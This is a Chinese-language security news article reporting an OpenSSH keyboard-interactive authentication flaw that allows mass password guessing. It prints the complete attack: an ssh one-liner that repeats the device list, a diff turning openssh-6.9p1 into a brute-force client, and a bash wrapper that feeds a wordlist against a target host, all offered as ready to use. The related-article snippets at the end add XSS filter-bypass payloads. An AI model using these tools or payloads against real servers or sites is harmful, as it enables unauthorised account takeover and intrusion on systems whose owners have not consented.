OpenSSH漏洞可導致伺服器被暴力破解 研究人員公布利用方法

2022-01-31 安全牛

利用安全遠程訪問工具OpenSSH中的一個漏洞,攻擊者可繞過認證重試次數的限制,進行大量的口令猜解。一位網名為Kingcope的安全人員近日在博客上發布了這個漏洞的利用方法。

OpenSSH伺服器的「鍵盤交互」認證是打開的,默認設置為允許6次認證嘗試,客戶端只允許3次,然後就會關閉與伺服器的連接。然而,這個認證機制可以在單次連接中進行多次認證嘗試。利用這個漏洞,攻擊者能夠在允許登錄時間的2分鐘內進行多次口令嘗試,也就意味著成千上萬次的暴力破解。

而且,即使在OpenSSH的配置中把口令認證設置成「no」並使用公共密鑰認證也無法防止這種攻擊。

漏洞利用方法:

ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targethost

這條命令可以在登錄時間嘗試多達10000個口令。下面是openssh-6.9p1的攻擊補丁,打上這個補丁之後即可執行遠程破解:

---分割線--

diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c

83a84,85

> char password[1024];

>

510c512,517

< authctxt->success = 1; /* break out */

---

> printf("==============================================\n");

> printf("*** SUCCESS **********************************\n");

> printf("*** PASSWORD: %s\n", password);

> printf("==============================================\n");

> exit(0);

>

1376a1384,1385

> char *devicebuffer;

> int i;

1386a1396,1405

> devicebuffer = calloc(1, 200000);

> if (!devicebuffer) {

> fatal("cannot allocate devicebuffer");

> }

>

> for (i=0;i<200000-2;i+=2) {

> memcpy(devicebuffer + i, "p,", 2);

> }

> devicebuffer[200000] = 0;

>

1393,1394c1412

< packet_put_cstring(options.kbd_interactive_devices ?

< options.kbd_interactive_devices : "");

---

> packet_put_cstring(devicebuffer);

1408c1426

< char *name, *inst, *lang, *prompt, *response;

---

> char *name, *inst, *lang, *prompt;

1410c1428

< int echo = 0;

---

> char *pos;

1425a1444

>

1430a1450

>

1443,1449c1463,1469

< echo = packet_get_char();

<

< response = read_passphrase(prompt, echo ? RP_ECHO : 0);

<

< packet_put_cstring(response);

< explicit_bzero(response, strlen(response));

< free(response);

---

> packet_get_char();

> if (fgets(password, 1024, stdin) == NULL)

> exit(0);

> if ((pos=strchr(password, '\n')) != NULL)

> *pos = '';

> printf("%s\n", password);

> packet_put_cstring(password);

---分割線---

補丁打上之後,即可使用下面的shell腳本掛上詞彙表進行口令破解的嘗試:

---分割線---

#!/bin/bash

# run as:

# cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target

#

while true

do

./ssh -l$1 $2

rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi

echo Respawn due to login grace time...

done

---分割線---

例如:

cat wordlist.txt | ./sshcracker.sh test 192.168.2.173

該攻擊已經在FreeBSD 10.1系統及老版本如6.2上成功測試。

---

要聞/乾貨/原創/專業 關注「安全牛


相關焦點

  • 當雲伺服器頻繁被暴力破解時的防護措施——數據灣
    有很多小夥伴來跟小灣講,雲伺服器經常被人暴力破解登錄,導致IP 被凍結;為了防止雲伺服器被暴力破解,小灣給大家介紹一些簡單的防護措施。# 禁用root用戶前當然還需要新建一個用戶adduser 用戶名# 修改用戶密碼password 用戶名# 修改新建用戶的權限,先把權限文件的權限變成可編輯chmod -v u+w /etc/sudoers# 修改權限文件vim /etc/sudoers# 在文件最下方添加如下內容,為新帳號添加權限後,保存並退出用戶名 ALL = (ALL) ALL:wq# 最後為了安全,把權限配置文件的可編輯權限取消
  • 微信支付的JAVA SDK存在漏洞,可導致商家伺服器被入侵(繞過支付)
    今日,白帽匯安全研究院關注到國外安全社區公布微信支付官方SDK存在嚴重漏洞,可導致商家伺服器被入侵(繞過支付的效果)。目前,漏洞詳細信息以及攻擊方式已被公開,影響範圍巨大(已確認陌陌、vivo因使用該SDK而存在該漏洞),建議用到JAVA SDK的商戶快速檢查並修復。
  • NSA公布國內被高頻利用的25個漏洞
    美國國家安全局(NSA)發布了一份報告,並公布了25個「中國黑客」在野攻擊中利用的漏洞,其中包括已經被修復的知名漏洞。大部分在公布名單裡的漏洞都是可以公開獲取的,所以常被黑客利用。通過這些漏洞,黑客可以獲得對目標網絡的初始訪問權限。從Internet直接訪問的系統會受到很大影響,如防火牆和網關。
  • iOS爆bootrom漏洞:可導致iPhone永久越獄,系統升級也無法破解
    驅動中國2019年9月29日消息 iOS漏洞時長有,但這一次還真不一般。據外媒報導稱,一名國外安全研究員axi0mX於日前在Twitter上披露了一則消息,稱iOS存在著一個不可修復的bootrom漏洞,可導致數以億計的iOS設備遭到永久性、不可阻擋的越獄。
  • 黑客如何破解你的網站Web伺服器?
    Web伺服器需要硬體和軟體。攻擊者通常以軟體中的攻擊為目標,以獲得授權進入伺服器的權限。讓我們看一下攻擊者利用的一些常見漏洞。 默認設置 - 攻擊者可以輕鬆猜出這些設置,如默認用戶ID和密碼。默認設置還可能允許執行某些任務,例如在伺服器上運行可以利用的命令。
  • 最近的 OpenSSH 漏洞究竟有多大危害?
    其中,CVE-2016-10009 可以用來「任意執行代碼」,因此,強烈建議大家立即更新所有的伺服器,而且客戶端也不能除外。但是,這些漏洞究竟有多大危害呢?是否可以利用這些漏洞控制伺服器呢?我們一起來仔細看看:CVE-2016-10009:sshd 伺服器可以利用轉發的 agent-socket 文件欺騙本機的 ssh-agent 加載一個惡意 PKCS#11 模塊,任意執行代碼。換句話說,是惡意伺服器在客戶端的機器上遠程執行代碼。
  • 黑客破解漏洞取得D-Link路由器操控權
    研究員發現,部分D-Link路由器存在多個漏洞,黑客利用這些漏洞可獲得其全部控制權,且目前尚無安全補丁發布。這些漏洞影響多個系列D-Link路由器httpd 伺服器,包括DWR-116, DWR-111,DIR-140L, DIR-640L, DWR-512, DWR-712, DWR-912及 DWR-921。
  • 常規web滲透測試漏洞合集
    暴力破解漏洞描述由於沒有對登錄頁面進行相關的防暴力破解機制,如無驗證碼、有驗證碼但驗證碼未在伺服器端校驗以及無登錄錯誤次數限制等,導致攻擊者可通過暴力破解獲取用戶登錄帳戶及口令,從而獲取網站登錄訪問權限!
  • 黑客找到iOS 11鎖屏密碼漏洞:連接數據線暴力破解
    iOS的口碑與其良好的安全性不可分,然而隨著美國相關執法部門藉助Grayshift進行破解的事情曝光,公眾開始極為擔憂起來。據ZDNet報導,安全研究人員Matthew Hickey稱,自己發現了繞過iPhone鎖屏密碼保護的方法。
  • 黑客可利用Apache Guacamole漏洞進行遠程桌面攻擊
    據國外安全機構CheckPoint的一項新研究發現Apache Guacamole中存在多個嚴重反向RDP漏洞,Apache Guacamole是一種流行的遠程桌面應用程式,系統管理員用來遠程訪問和管理Windows和Linux計算機。
  • PHP文件包含漏洞利用思路與Bypass總結手冊(完結)
    那麼該怎麼去繞過這個限制呢,一般做法是逆過程,既然他選擇了編碼或加密,我們就可以嘗試著利用解碼或解密的手段還原真實session,然後再去包含,這個時候就能夠將惡意的session信息包含利用成功。很多時候伺服器上的session信息會由base64編碼之後再進行存儲,那麼假如存在本地文件包含漏洞的時候該怎麼去利用繞過呢?下面通過一個案例進行講解與利用。
  • 迪普科技:慧眼識漏洞之【後門漏洞】
    慧眼幫您識漏洞。  後門持久又隱蔽,繞過認證和加密。  執行代碼傳文件,注入程序來攻擊。  漏洞補丁常升級,可疑文件不接收。  實時關注新動態,慧眼快速來排查。  後門  後門是一種繞過認證或系統加密來獲取系統訪問權的方法。
  • 暴力破解及其流行工具研究
    暴力破解攻擊是最流行的密碼破解方法之一,然而,它不僅僅是密碼破解。暴力攻擊還可用於發現Web應用程式中的隱藏頁面和內容,在你成功之前,這種攻擊基本上是「攻擊一次嘗試一次」。這種攻擊有時需要更長的時間,但其成功率也會更高。
  • Golang蠕蟲將Windows和Linux伺服器變成門羅幣挖礦機
    2020年12月初,研究人員發現了一個新的用Golang語言編寫的蠕蟲。該蠕蟲嘗試在網絡中傳播來大規模地運行XMRig挖礦機。惡意軟體的目標是Windows和Linux伺服器。在老版本中,該蠕蟲嘗試利用WebLogic的漏洞——CVE-2020-14882。研究人員分析發現,攻擊者持續更新C2伺服器上的蠕蟲,表明惡意軟體開發者非常活躍,而且在未來的更新中可能會攻擊其他弱配置的服務。
  • Web常見漏洞描述及修復建議
    11.暴力破解  漏洞描述  由於沒有對登錄頁面進行相關的人機驗證機制,如無驗證碼、有驗證碼但可重複利用以及無登錄錯誤次數限制等,導致攻擊者可通過暴力破解獲取用戶登錄帳號和密碼。  3、通過查看日誌、伺服器殺毒等安全排查,確保伺服器未被留下後門22.備份文件洩露  漏洞描述  網站備份文件或、敏感信息文件存放在某個網站目錄下,攻擊者可通過文件掃描等方法發現並下載該備份文件,導致網站敏感信息洩露。
  • 今年最嚴重Windows漏洞之一:有黑客利用Zerologon植入伺服器後門
    安全研究人員本周五發布警告稱,2020 年最嚴重的 Windows 漏洞之一目前正被黑客廣泛利用,從而對網絡中那些存儲用戶憑證和管理員帳號的伺服器植入後門。該漏洞名為「Zerologon」,能讓攻擊者訪問活動目錄,以管理員身份創建、刪除和管理網絡帳號。
  • 常見WEB基礎漏洞
    如果是在js中,我們可以用反引號代替單雙引號<img src="x" onerror=alert(`xss`);>2.過濾括號當括號被過濾的時候可以使用throw來繞過<svg/onload="window.onerror=eval;throw'=alert\x281\x29';"> 10.使用url編碼<img src="x" onerror=document.location=`http
  • 手把手教你用Python進行SSH暴力破解
    暴力破解屬於密碼破解的一種,也是最常見的破解方法之一,通過不斷的嘗試來達到破解的目的,所以暴力破解的本質就是一種枚舉。現在也有很多流行的破解軟體,不過個人覺得裝上kail其實也就啥都有了,但是今天我們不說他們,今天主題是如何使用Python來進行SSH的暴力破解。
  • 超 80% 健康 App 有高危漏洞,暴力攻擊...
    (44.39%)、可被利用的高危埠開放(49.46%)。攻擊者可利用這些漏洞進行 App 仿冒、植入惡意程序、竊取用戶敏感信息、攻擊服務等,對 App 安全具有嚴重威脅。2.以流氓行為為代表的惡意程序感染加劇
  • 全球超50000臺伺服器遭攻擊,它說是中國黑客幹的
    據 Bleeping Computer 美國時間 5 月 29 日報導,近日,Guardicore 網絡安全實驗室的研究人員發布了一份詳細的報告,內容涉及全球範圍內攻擊 Windows MS-SQL 和 PHPMyAdmin 伺服器的廣泛攻擊活動。